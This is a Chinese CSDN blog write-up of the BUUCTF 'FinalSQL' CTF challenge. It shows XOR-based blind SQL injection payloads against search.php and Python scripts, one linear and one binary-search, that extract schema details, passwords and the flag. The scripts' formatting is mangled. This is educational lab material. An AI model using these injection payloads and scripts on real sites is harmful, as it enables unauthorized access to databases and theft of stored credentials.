[极客大挑战 2019]FinalSQL

最新推荐文章于 2023-09-15 21:02:23 发布
最新推荐文章于 2023-09-15 21:02:23 发布
阅读量104 收藏
点赞数
分类专栏: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_40546436/article/details/119026692
版权
本文介绍了一种通过burpsuite测试发现的盲注漏洞,作者详细展示了如何利用search.php的特殊字符支持,逐步获取数据库名、表名、列名和数据的过程,最终实现敏感信息的泄露。改进的二分法程序显著提高了效率。
摘要由CSDN通过智能技术生成

知识点:盲注
打开题目后,发现有两个链接,一个是check.php,一个是search.php。
使用burpsuite测试发现,check.php屏蔽了大多的特殊字符,基本上没有注入可能,而search.php支持^,select,有盲注可能。
基本思路如下
获取库名
1^(ascii(substr((select(database())),%d,1))<%d)
这里有几点说明
取到库名后,一位位取出,如果小于某个值,则返回1,1^1 异或得到0,根据id=0无法取到数据,否则得到1,可以正常根据id=1取到数据。

如果这一位不存在了,那么ascii返回0.可以直接根据<0,得到下面的值为1。
1^(ascii(substr((select(database())),66,1))<0)

获取表名
id=1^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema=‘geek’)),%d,1))<%d)
获取列名
1^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name=‘Flaaaaag’)),%d,1))<%d)

获取数据
1^(ascii(substr((select(group_concat(fl4gawsl))from(geek.Flaaaaag)),%d,1))<%d)

编写的测试程序

import requests

url =“http://e9d1c3ce-2804-4b26-9284-04e76ea33024.node4.buuoj.cn/search.php?id=1”
#html = requests.get(url+’?select=O:4:“Name”:3:{s:14:"\0Name\0username";s:5:“admin”;s:14:"\0Name\0password";i:100;}’)
html=requests.get(url)
print(html)
print(html.text)
if( “NO! Not this!” in html.text ):
print(“get correct”)

database = “”

i=1
j=1
myend = 0
while(False ):
i=0
if (myend == 1):
break;
while(i < 255):
mystr="^(ascii(substr((select(database())),"+str(j)+",1))="+str(i)+")"
#print mystr
html = requests.get(url+mystr)
#print(html.text)
if( “ERROR” in html.text ):
if ( i == 0):
myend = 1
break
#print(html.text)
print "the ", j, " station is " , chr(i)
database = database + chr(i)
break;
i=i+1
j=j+1

print "the database is " + database

mytable = “”

i=1
j=1
myend = 0
while(False ):
i=0
if (myend == 1):
break;
while(i < 255):
mystr="^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema=‘geek’)),"+str(j)+",1))="+str(i)+")"
#print mystr
html = requests.get(url+mystr)
#print(html.text)
if( “ERROR” in html.text ):
if ( i == 0):
myend = 1
break
#print(html.text)
print "the ", j, " station is " , chr(i)
mytable = mytable + chr(i)
break;
i=i+1
j=j+1

print "the mytable is " + mytable
#the mytable is F1naI1y,Flaaaaag

column = “”

i=1
j=1
myend = 0
while(False ):
i=0
if (myend == 1):
break;
while(i < 255):
#mystr="^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name=‘Flaaaaag’)),"+str(j)+",1))="+str(i)+")"
mystr="^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name=‘F1naI1y’)),"+str(j)+",1))="+str(i)+")"
#print mystr
html = requests.get(url+mystr)
#print(html.text)
if( “ERROR” in html.text ):
if ( i == 0):
myend = 1
break
#print(html.text)
print "the ", j, " station is " , chr(i)
column = column + chr(i)
break;
i=i+1
j=j+1

print "the column is " + column
#the column is id,fl4gawsl of table Flaaaaag
#the column is id,username,password of table F1naI1y

flag = “”

i=1
j=1
myend = 0
while(True ):
i=0
if (myend == 1):
break;
while(i < 255):
#mystr="^(ascii(substr((select(group_concat(fl4gawsl))from(geek.Flaaaaag)),"+str(j)+",1))="+str(i)+")"
mystr="^(ascii(substr((select(group_concat(password))from(geek.F1naI1y)),"+str(j)+",1))="+str(i)+")"
#print mystr
html = requests.get(url+mystr)
#print(html.text)
if( “ERROR” in html.text ):
if ( i == 0):
myend = 1
break
#print(html.text)
print "the ", j, " station is " , chr(i)
flag = flag + chr(i)
break;
i=i+1
j=j+1

print "the flag is " + flag
#the flag is cl4y_is_really_amazing,welcome_to_my_blog,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,http://www.cl4y.top,welcom_to_Syclover,cl4y_really_need_a_grilfrind,fag{43aac970-9210-4d90-8c8f-82bc64c74425}

上面的程序运行太慢了,因为判断的次数太多了,下面是是二分法改的程序,一是设置了判断的上下限从31-127这个可见字符段。二是通过二分法减小了次数。
判断逻辑就是通过二分法将上下限限制成两个相临的数,那么大的那个数就是要取的值

import requests

url =“http://e9d1c3ce-2804-4b26-9284-04e76ea33024.node4.buuoj.cn/search.php?id=1”
flag = ‘’
def payload(i,j):

mystr="^(ascii(substr((select(group_concat(password))from(geek.F1naI1y)),"+str(j)+",1))>"+str(i)+")"
html = requests.get(url+mystr)
#print url+mystr
#print (html.text)
if(  "ERROR" in html.text ):
    res = 1
else:
    res = 0

return res

#judge if is 0
def payload2(j,i):

mystr="^(ascii(substr((select(group_concat(password))from(geek.F1naI1y)),"+str(j)+",1))="+str(i)+")"
html = requests.get(url+mystr)

if(  "ERROR" in html.text ):
    res = 1
else:
    res = 0

return res

def exp():
global flag
j=1
i=1
myend = False
while(True):
if (payload2(j,0) == 1):
break;
low=31
high=127
while(True):
ave = (low+high)/2
print “ave is”,ave
ret = payload(ave,j)
if (ret == 1):
low = ave
else:
high = ave

		if (high-low==1):
			print "the ", j, " station is " , chr(high)
			flag = flag + chr(high)
			break

	j=j+1

exp()
print(‘flag=’,flag)

weixin_40546436
关注
专栏目录
[极客挑战 2019]FinalSQL - 异或盲注
oZuoShen123的博客
10-05 531
1、这题的关键是找注入点,如果选择用户名、密码作为输入点就麻烦了 2、注入点:按钮,点击就传id;当id=1时,提示Click others   可以利用id的特性,构造异或匹配   payload: f"1^(ord(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),{j},1))={i})^1"   payload有两个异或:1^表达式^1
[极客挑战 2019]FinalSQL 1
weixin_45577185的博客
10-12 440
开始试了试登录框,用sql注入,发现总是出现 后来发现url可能存在注入 通过bp,发现过滤了很多 输入11回显’ERROR’,10回显’NO! Not this! Click others~~~’ 由于空格被过滤,用()代替。 import requests url = 'http://279ed640-ef9f-410b-91f4-ac2f33bca34f.node4.buuoj.cn:81/search.php' flag = '' for i in range(1,250):# range.
buuctf [极客挑战 2019]FinalSQL
zoixsoadji的博客
03-30 756
进入题目,又是这个作者,试试万能密码 经过实验,双写什么的都没用。 作者说的神秘代码,点进去发现url变了 发现并没有什么卵用…… 正当我没有头绪的时候,我突然看到一句话,审题真的很重要: 盲注!这里附上大佬的脚本: import requests import time url = "http://def9937b-1746-4f41-98c7-a2b55b95664a.node4.buuoj.cn:81/search.php" temp = {"id" : ...
BUUCTF [极客挑战 2019]FinalSQL
qq_60829702的博客
10-21 1368
因为之前的几道盲注题目我都是直接看师傅的wp拿来用的,现在自己写一下发现果然光看不如去写。只有自己真正的去写了脚本才会发现一些东西永远都是看起来简单的一批,但是真正的让自己独立写出来还是有点难度的。毕竟那是别人的东西不是自己的东西,我们要把其他师傅的知识变成我们自己的。本人菜鸟一枚,虽然花了挺多时间写这个题目和wp的,但是收获到了很多东西,也希望我能坚持下来。
[极客挑战 2019]FinalSQL wp
{OvEr}的博客
11-19 471
[极客挑战 2019]FinalSQL wp 终极sql注入了,考点是盲注(写脚本的那种இ௰இ) 打开网页是这样的。 那个红色的卡片,我们随便点进去看看,直接点最后一个吧。 通过url判断注入点是id。 接着做FUZZ测试,发现同样过滤了union、or、and、||、&等我们常用的关键字,但是没有过滤异或符号^。 当我们输入id=1^1时,回显"Error" 当我们输入id=1^0时,回显正常 接下来我们进行盲注,下面是大神的脚本 step 1爆数据库 import requests u
BUUCTF-[极客挑战 2019]FinalSQL
最新发布
weixin_44016181的博客
09-15 463
除了普通的注入流程,报错注入,时间注入外,这题涉及了布尔注入当中的异或注入,根据回显的状态信息来获取数据库的相关信息。这样即便是我们不能直接调用和查看数据库,也能通过这种特别的注入方式得到flag。
CTF-Web-[极客挑战 2019]FinalSQL
归子莫的博客
05-03 994
CTF-Web-[极客挑战 2019]FinalSQL 博客说明 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! CTP平台 网址 https://buuoj.cn/challenges 题目 Web类,[极客挑战 2019]FinalSQL 打开题目的实例 思路 SQl的题目,首先试...
极客挑战 2019]EasySQL
09-03
EasySQL极客挑战 2019 中的一个题目,它是一个简单的 SQL 数据库查询题目。可以通过编写 SQL 查询语句来实现对给定的数据库表进行数据查询和分析。 在 EasySQL 中,你将面对一个包含不同表的数据库,你需要根据题目要求来编写 SQL 查询语句,从而得到正确的结果。这道题的目标是考察你对 SQL 查询语句的掌握程度和对数据库操作的理解。 在极客挑战 2019 中,EasySQL 是一个相对较简单的题目,旨在帮助参赛者熟悉 SQL 查询语句的基本使用和常见操作。通过解决这个问题,你将能够提高自己的 SQL 查询能力,并为更复杂的数据库操作打下基础。 如果你有关于 EasySQL 的具体问题,我可以帮助你更详细地解答。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值